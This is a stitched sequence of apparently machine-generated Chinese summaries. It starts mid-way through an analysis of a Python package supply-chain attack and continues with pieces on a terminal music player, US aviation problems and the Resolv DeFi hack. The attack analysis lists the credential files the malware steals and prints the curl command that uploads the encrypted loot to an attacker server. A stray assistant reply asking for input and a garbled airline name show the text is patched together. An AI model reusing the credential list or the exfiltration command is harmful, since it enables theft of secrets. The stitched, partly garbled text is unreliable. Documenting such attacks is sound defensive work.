  • SSH 密钥: ~/.ssh/id_rsa, ~/.ssh/id_ed25519
  • Git 凭据: ~/.gitconfig, ~/.git-credentials
  • AWS 凭据: ~/.aws/credentials, ~/.aws/config, IMDS token + 安全凭据
  • Kubernetes 密钥: ~/.kube/config, /etc/kubernetes/admin.conf
  • GCP 凭据: ~/.config/gcloud/application_default_credentials.json
  • Azure 凭据: ~/.azure/
  • Docker 配置: ~/.docker/config.json
  • 包管理器配置: ~/.npmrc, ~/.vault-token
  • Shell 历史记录: ~/.bash_history, ~/.zsh_history
  • 加密钱包: ~/.bitcoin/, ~/.litecoin/
  • SSL/TLS 私钥: /etc/ssl/private/, Let's Encrypt .pem.key 文件
  • CI/CD 密钥: terraform.tfvars, .gitlab-ci.yml
  • 数据库凭据: PostgreSQL, MySQL, Redis, LDAP 配置
  • Webhook URL: 在环境变量和配置文件中查找 Slack/Discord webhook URL

阶段 2: 加密与外泄

  1. 收集的数据写入临时文件。
  2. 生成一个 32 字节的 AES-256 会话密钥。
  3. 使用 openssl enc -aes-256-cbc -pbkdf2 加密收集的数据。
  4. 使用 硬编码的 4096 位 RSA 公钥 加密 AES 会话密钥。
  5. 将两个加密文件打包到 tpcp.tar.gz 压缩包中。
  6. 通过以下 curl 命令将压缩包外泄到攻击者控制的服务器:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

关键技术细节

  • 触发机制: site-packages/ 目录下的 .pth 文件在 Python 解释器启动时会自动执行 (参考 [Python 文档](https
Opera: Rewind The Web to 1996 (Opera at 30)

Please provide the content you want me to summarize. I need the text to be able to fulfill your request. Once you provide the content, I will generate a concise and accurate summary in markdown format and Chinese language, adhering to the specified length and constraints.

A retro terminal music player inspired by Winamp

好的,以下是根据您提供的文本生成的摘要,使用Markdown格式,并以中文呈现:

cliamp:复古终端音乐播放器

cliamp 是一个受 Winamp 启发的复古终端音乐播放器,旨在提供丰富的功能和多样的播放源支持。

主要特点:

  • 播放源丰富: 支持本地文件、网络流媒体、播客、YouTube、YouTube Music、SoundCloud、Bilibili、Spotify、小宇宙 (Navidrome) 和 Plex 等多种播放源。
  • 可视化: 配备频谱可视化效果。
  • 均衡器: 提供参数均衡器 (parametric EQ) 功能。
  • 播放列表管理: 支持播放列表管理。
  • 广播: 内置广播功能,可以收听 30,000+ 个在线电台,可以通过 R 键浏览和搜索。 用户可以自定义广播电台列表,保存在 ~/.config/cliamp/radios.toml 文件中。
  • 自定义: 支持主题定制。

技术栈:

cliamp 使用以下技术构建:

安装方式:

  • curl: curl -fsSL https://raw.githubusercontent.com/bjarneo/cliamp/HEAD/install.sh | sh
  • Homebrew: brew install bjarneo/cliamp/cliamp
  • Arch Linux (AUR): yay -S cliamp
  • 预编译二进制文件:GitHub Releases 下载。
  • 从源代码构建:
    1. git clone https://github.com/bjarneo/cliamp.git
    2. cd cliamp
    3. go build -o cliamp .

快速开始:

  • cliamp ~/Music:播放 Music 目录下的文件。
  • cliamp *.mp3 *.flac:播放所有 mp3 和 flac 文件。
  • cliamp https://example.com/stream:播放网络流媒体 URL。
  • Ctrl+K:查看所有快捷键绑定。

构建依赖 (从源代码构建):

  • Go 1.25.5 或更高版本
  • ALSA 开发头文件 (Linux 系统)

其他文档:

cliamp 提供了详细的文档,包括:

  • 配置
  • 快捷键
  • 命令行标志
  • 流媒体
  • 播放列表
  • YouTube, SoundCloud, Bandcamp 和 Bilibili 支持
  • YouTube Music 支持
  • 歌词
  • Spotify 支持
  • Navidrome 支持
  • Plex 支持
  • 主题
  • 音频质量
  • MPRIS 支持

故障排除:

如果遇到无音频输出问题(无错误),请确保在 Linux 系统上安装了 pipewire-alsa (PipeWire) 或 pulseaudio-alsa (PulseAudio) 桥接包。

作者:

x.com/iamdothash

免责声明:

使用此软件需自担风险。开发者不对因使用此软件而产生的任何损害或问题负责。

American aviation is near collapse?

美国航空系统面临危机:总结

本文指出,曾经的美国商业航空系统是现代奇迹,拥有安全、便捷、相对廉价的航空服务。然而,近期该系统正面临崩溃的风险。

当前困境:

  • 机场延误: 由于政府部分停摆,运输安全管理局(TSA)员工自情人节以来未发工资,导致机场安检排队时间过长,例如纽约两到三个小时,亚特兰大三个小时,休斯顿两小时。
  • 拉瓜迪亚机场关闭: 空加积航空公司的飞机与机场消防车相撞,造成两名飞行员死亡,数十人受伤,拉瓜迪亚机场被迫关闭,对周边机场造成压力。
  • 纽瓦克机场问题: 纽瓦克机场近期出现多起安全事件,包括一架阿拉斯加航空公司飞机险些撞上联邦快递飞机,以及新加坡航空公司飞机剐蹭到精神航空公司的飞机。此外,上月曾出现空中交通管制塔台冒烟,导致短暂停飞,更早前则曾出现短暂失去对飞机跟踪能力的情况。

根源分析:

  • 长期 disinvestment: 美国政府长期以来试图以低成本运营空中交通管制系统,导致人员短缺和设备陈旧,许多塔台运营在最低限度。
  • 政治功能失调: 缺乏对问题的有效解决,例如FAA使用过时的技术(如软盘和铜线),但由于国会和总统未能达成共识,问题迟迟未被解决。
  • 监管失灵: 航空管理局(FAA)与波音公司存在“监管俘获”现象,导致波音737 Max系列飞机的问题未能及时发现。
  • 政治操弄: 为解决政治危机,政府将移民和海关执法(ICE)人员调往机场,但这些人员缺乏相关培训,且优先关注边境安全,显得不合常理。

历史背景:

  • 20世纪70年代航空业的放松管制促进了航空服务的普及和降低成本。
  • 从2009年到2025年,美国航空公司实现了无致命事故的16年安全记录。
  • 虽然拉瓜迪亚机场已经翻新,但其他更重要的系统环节却持续恶化。

总结:

文章认为,美国航空系统正面临着由长期 disinvestment、政治功能失调和不当措施造成的危机,系统已经由“笨拙但暂时有效的”解决方案支撑,这些临时措施可能即将失效。

The Resolv hack: How one compromised key printed $23M

Resolv DeFi 协议攻击事件总结 (Resolv DeFi Protocol Attack Summary)

2026 年 3 月 22 日,Resolv DeFi 协议遭受攻击,成为 DeFi 领域快速崩盘的又一例证。攻击者在几分钟内 通过恶意铸造了数千万枚无抵押的稳定币 (USR) 并提取了约 2300 万美元的价值,导致代币价格大幅脱锚,并迫使协议 暂停运营

这次并非普通的智能合约漏洞,而是 过度信任链下基础设施 造成的。随着 DeFi 系统日益复杂,依赖外部服务、特权密钥和云基础设施,攻击面已经扩展至区块链之外。

事件梗概:

攻击者先以约 10 万至 20 万美元的 USDC 存款开始,利用 Resolv 的 USR 稳定币铸造系统。正常情况下,用户应以 USDC 存款换取等值的 USR。但攻击者成功铸造了约 8000 万枚 USR,远超其存款应有的数量。

这得益于铸造审批依赖于一个链下服务,该服务使用特权私钥签署铸造数量。然而,智能合约本身并未设置铸造上限,仅检查签名是否有效。

攻击者铸造无抵押 USR 后,迅速将其转化为 wstUSR (Wrapped Staked USR),然后逐步将其兑换成其他稳定币和 ETH。最终,攻击者提取了约 2500 万美元的 ETH。大量无抵押 USR 涌入市场,导致代币价格下跌了约 80%。

铸币机制详解:

Resolv 的铸币过程涉及两步链下流程:

  1. requestSwap: 用户将 USDC 存入 USR Counter 合约并提交铸币请求。
  2. completeSwap: 链下服务 (SERVICE_ROLE 密钥控制) 审查请求并调用合约以确定铸造的 USR 数量。

合约只设置了 USR 输出的 最低限度未设置最高限度。没有抵押品与 USR 铸造比例的链上检查,没有价格预言机,没有铸造上限。密钥持有者签署的内容将被铸造。

攻击步骤:

  1. 攻陷 Resolv 的 AWS KMS 环境: 攻击者入侵 Resolv 的云基础设施,获取了存储协议特权签名密钥的 AWS Key Management Service (KMS) 环境。
  2. 铸造 USR 代币: 攻击者利用签名密钥提交了两个铸币请求,总计 USDC 存款约 10 万至 20 万美元。SERVICE_ROLE 密钥被用于调用 completeSwap,授权了数千万 USR 兑换 USDC 存款
  3. 绕过流动性:wstUSR 攻击者将 USR 转换为 wstUSR,使其能够进入流动性池。
  4. 资金清算: 攻击者将 wstUSR 兑换成稳定币和 ETH,通过多个 DEX 池和桥进行操作,最大化收益并隐藏踪迹。

目前,攻击者钱包持有:

  • 约 11,400 ETH (约 2400 万美元)
  • 约 2000 万 wstUSR (按当前低价计算,约 130 万美元)

后果:

大量无抵押 USR 涌入 DEX 流动性池,导致 USR 代币价格暴跌